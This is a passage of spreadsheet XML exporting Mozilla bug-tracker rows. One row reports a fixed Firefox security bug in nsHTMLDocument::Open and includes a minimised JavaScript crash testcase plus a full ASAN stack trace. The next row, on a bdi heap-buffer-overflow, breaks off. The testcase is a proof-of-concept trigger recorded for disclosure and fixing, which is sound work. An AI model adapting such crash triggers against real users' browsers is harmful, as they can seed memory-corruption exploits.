          <t>js::AssertSameCompartment failure in nsHTMLDocument::Open</t>
        </is>
      </c>
      <c r="D2831" t="inlineStr">
        <is>
          <t>2024-05-30 09:48:32 -0700</t>
        </is>
      </c>
      <c r="E2831" t="n">
        <v>1</v>
      </c>
      <c r="F2831" t="n">
        <v>1</v>
      </c>
      <c r="G2831" t="n">
        <v>3</v>
      </c>
      <c r="H2831" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2831" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2831" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2831" t="inlineStr">
        <is>
          <t>64 Branch</t>
        </is>
      </c>
      <c r="L2831" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2831" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2831" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2831" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2831" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main63+][adv-esr60.3+]</t>
        </is>
      </c>
      <c r="Q2831" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2831" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2831" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T2831" t="n">
        <v>1</v>
      </c>
      <c r="U2831" t="n">
        <v>0</v>
      </c>
      <c r="V2831" t="n">
        <v>26</v>
      </c>
      <c r="W2831" t="inlineStr">
        <is>
          <t>Created attachment 9010609
crash.html (minimised testcase)
The following testcase crashes the lates ASAN build of Firefox 64.0a1 (BuildID=20180919100043). It looks like we have to win a race to trigger the issue, so it might require a few reloads/restarts.
&lt;script&gt;
function spin() {
        var x=new XMLHttpRequest();
        x.open("POST","https://mozilla.org",false);
        try{x.send("X");}catch(e){}
}
function start() {
	reloadurl = location.href;
	o707=window.document;
	o715=new WebSocket("ws://0.0.0.0");
	o731=o707.createElement('template');
	o707.onfocus=fun1;
	o715.onerror=fun0;
	spin();
}
function fun0() {
	o707.writeln("x");
}
function fun1() {
	x=o731.content;
	o707.execCommand('subscript',false,null);
	o707.open();
	window.top.setTimeout("window.top.location.href='"+reloadurl+"'",400);;
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28511==ERROR: AddressSanitizer: ILL on unknown address 0x55b844692b1f (pc 0x55b844692b1f bp 0x7ffd03e5ea70 sp 0x7ffd03e5e900 T0)
    #0 0x55b844692b1e in MOZ_CrashPrintf /builds/worker/workspace/build/src/mfbt/Assertions.cpp
    #1 0x7eff42067828 in fail /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:52:9
    #2 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:68
    #3 0x7eff42067828 in check /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:82
    #4 0x7eff42067828 in checkImpl&lt;JSObject *&gt; /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:194
    #5 0x7eff42067828 in check&lt;JSObject *&gt; /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:203
    #6 0x7eff42067828 in js::AssertSameCompartment(JSContext*, JSObject*) /builds/worker/workspace/build/src/js/src/jsfriendapi.cpp:418
    #7 0x7eff3a1724dd in mozilla::dom::ReparentWrapper(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2279:3
    #8 0x7eff3aeb9ee3 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional&lt;nsTSubstring&lt;char16_t&gt; &gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1532:11
    #9 0x7eff39b73a75 in mozilla::dom::HTMLDocument_Binding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:215:53
    #10 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #11 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #12 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #13 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #14 0x7eff42f89184 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #15 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #16 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #17 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #18 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #19 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #20 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #21 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #22 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #23 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #24 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #25 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #26 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #27 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #28 0x7eff3727d8e1 in FocusBlurEvent::Run() /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2077:12
    #29 0x7eff36c18186 in AddScriptRunner /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5674:13
    #30 0x7eff36c18186 in nsContentUtils::AddScriptRunner(nsIRunnable*) /builds/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5681
    #31 0x7eff371bb3e3 in nsFocusManager::FireFocusOrBlurEvent(mozilla::EventMessage, nsIPresShell*, nsISupports*, bool, bool, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:2250:5
    #32 0x7eff371ba714 in nsFocusManager::FireDelayedEvents(nsIDocument*) /builds/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1081:9
    #33 0x7eff3714d537 in FireOrClearDelayedEvents(nsTArray&lt;nsCOMPtr&lt;nsIDocument&gt; &gt;&amp;, bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9016:11
    #34 0x7eff3714cd10 in nsIDocument::UnsuppressEventHandlingAndFireEvents(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9332:5
    #35 0x7eff36cca940 in nsGlobalWindowInner::FreeInnerObjects() /builds/worker/workspace/build/src/dom/base/nsGlobalWindowInner.cpp:1211:13
    #36 0x7eff36d4a455 in nsGlobalWindowOuter::SetNewDocument(nsIDocument*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:1973:19
    #37 0x7eff3aeb9b20 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional&lt;nsTSubstring&lt;char16_t&gt; &gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1498:22
    #38 0x7eff3aebebb4 in nsHTMLDocument::WriteCommon(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1768:38
    #39 0x7eff3aebdc20 in nsHTMLDocument::WriteCommon(JSContext*, mozilla::dom::Sequence&lt;nsTString&lt;char16_t&gt; &gt; const&amp;, bool, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:1686:5
    #40 0x7eff39b77c81 in mozilla::dom::HTMLDocument_Binding::writeln(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:421:9
    #41 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #42 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #43 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #44 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #45 0x7eff42f89184 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #46 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #47 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #48 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #49 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #50 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #51 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #52 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #53 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #54 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #55 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #56 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #57 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #58 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #59 0x7eff3a991ea6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #60 0x7eff3a945dc0 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&amp;, mozilla::dom::CallerType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:185:5
    #61 0x7eff3a9ba039 in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:213:13
    #62 0x7eff3ca34422 in mozilla::dom::WebSocket::CreateAndDispatchSimpleEvent(nsTSubstring&lt;char16_t&gt; const&amp;) /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1955:3
    #63 0x7eff3ca434c9 in mozilla::dom::WebSocketImpl::DispatchConnectionCloseEvents() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:1920:18
    #64 0x7eff3ca47bb7 in mozilla::dom::CallDispatchConnectionCloseEvents::Run() /builds/worker/workspace/build/src/dom/websocket/WebSocket.cpp:262:21
    #65 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
    #66 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #67 0x7eff3c927bb2 in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937:31)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:334:25
    #68 0x7eff3c927bb2 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2937
    #69 0x7eff3c925b80 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable&lt;mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2768:11
    #70 0x7eff39412c7f in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1277:9
    #71 0x7eff3a15d540 in bool mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3296:13
    #72 0x7eff42fa022b in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:461:15
    #73 0x7eff42fa022b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:553
    #74 0x7eff42f89184 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:613:12
    #75 0x7eff42f89184 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3451
    #76 0x7eff42f6e1d0 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:440:12
    #77 0x7eff42fa0d3e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:580:15
    #78 0x7eff42fa2ad2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:626:10
    #79 0x7eff4202f45d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2957:12
    #80 0x7eff3970a4b7 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:264:37
    #81 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #82 0x7eff3a9f0f8e in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214:12
    #83 0x7eff3a9a44d5 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:52
    #84 0x7eff3a9a66cc in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1342:20
    #85 0x7eff3a98a57e in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:390:5
    #86 0x7eff3a98a57e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:420
    #87 0x7eff3a9888a3 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:637:16
    #88 0x7eff3a98f172 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1112:9
    #89 0x7eff3d5cbed8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1167:7
    #90 0x7eff40438f83 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7089:21
    #91 0x7eff40433ff7 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6882:7
    #92 0x7eff4043d447 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #93 0x7eff357eddd5 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1309:3
    #94 0x7eff357ec9bc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:852:14
    #95 0x7eff357e84a9 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:741:9
    #96 0x7eff357ead82 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:627:5
    #97 0x7eff357ec4e4 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #98 0x7eff331cc492 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #99 0x7eff37141107 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8471:18
    #100 0x7eff37141107 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8393
    #101 0x7eff3711adfb in nsIDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5252:3
    #102 0x7eff372871cb in applyImpl&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1178:12
    #103 0x7eff372871cb in apply&lt;nsIDocument, void (nsIDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1184
    #104 0x7eff372871cb in mozilla::detail::RunnableMethodImpl&lt;nsIDocument*, void (nsIDocument::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1229
    #105 0x7eff32f0e3e5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:337:32
    #106 0x7eff32f4bdd8 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1161:14
    #107 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #108 0x7eff3415ec33 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #109 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #110 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #111 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #112 0x7eff3cd4d5a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #113 0x7eff411dedde in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:939:22
    #114 0x7eff3406166c in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:325:10
    #115 0x7eff3406166c in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:318
    #116 0x7eff3406166c in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:298
    #117 0x7eff411ddf03 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:765:34
    #118 0x55b84461fb91 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #119 0x55b84461fb91 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:287
    #120 0x7eff550bdb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #121 0x55b84454ef3c in _start (/home/nils/fuzzer3/firefox/firefox+0x2cf3c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ILL /builds/worker/workspace/build/src/mfbt/Assertions.cpp in MOZ_CrashPrintf
==28511==ABORTING</t>
        </is>
      </c>
      <c r="X2831" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2832">
      <c r="A2832" t="n">
        <v>1228882</v>
      </c>
      <c r="B2832" t="inlineStr">
        <is>
          <t>2015-11-29 13:37:09 -0800</t>
        </is>
      </c>
      <c r="C2832" t="inlineStr">
        <is>
          <t>"ASSERTION: element already removed from map" or heap-buffer-overflow with &lt;bdi&gt;, dir=auto</t>
        </is>
      </c>
      <c r="D2832" t="inlineStr">
        <is>
          <t>2020-03-10 14:48:55 -0700</t>
        </is>
      </c>
      <c r="E2832" t="n">
        <v>1</v>
      </c>
      <c r="F2832" t="n">
        <v>1</v>
      </c>
      <c r="G2832" t="n">
        <v>3</v>
      </c>
      <c r="H2832" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2832" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2832" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2832" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2832" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2832" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2832" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2832" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2832" t="inlineStr">
        <is>
          <t>[adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q2832" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2832" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2832" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T2832" t="n">
        <v>1</v>
      </c>
      <c r="U2832" t="n">
        <v>0</v>
      </c>
      <c r="V2832" t="n">
        <v>43</v>
      </c>
      <c r="W2832" t="inlineStr">
        <is>
          <t>Created attachment 8693363
testcase
Nonfatal assertion or scary crash, depending on how long the testcase was open:
1. Load
2. Quit
